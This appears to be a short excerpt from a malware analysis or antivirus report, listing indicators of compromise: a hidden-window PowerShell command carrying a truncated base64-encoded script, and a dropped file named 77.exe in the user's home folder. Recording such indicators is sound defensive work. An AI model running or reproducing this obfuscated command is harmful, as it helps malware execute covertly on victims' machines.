Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABGAGwAeAByAGgAYwBmAGQAPQAnAEEAZQBwAG8AcQBhAHcAcABjAHkAcgBrACcAOwAkAFYAdwBnAHkAbwBzAGwAcwBzAGgAbgBzACAAPQAgACcANwA3ACcAOwAkAFMAbwByAHcAeAB1AHUAcQBzAD0AJwBXAHQ...
- %HOMEPATH%\77.exe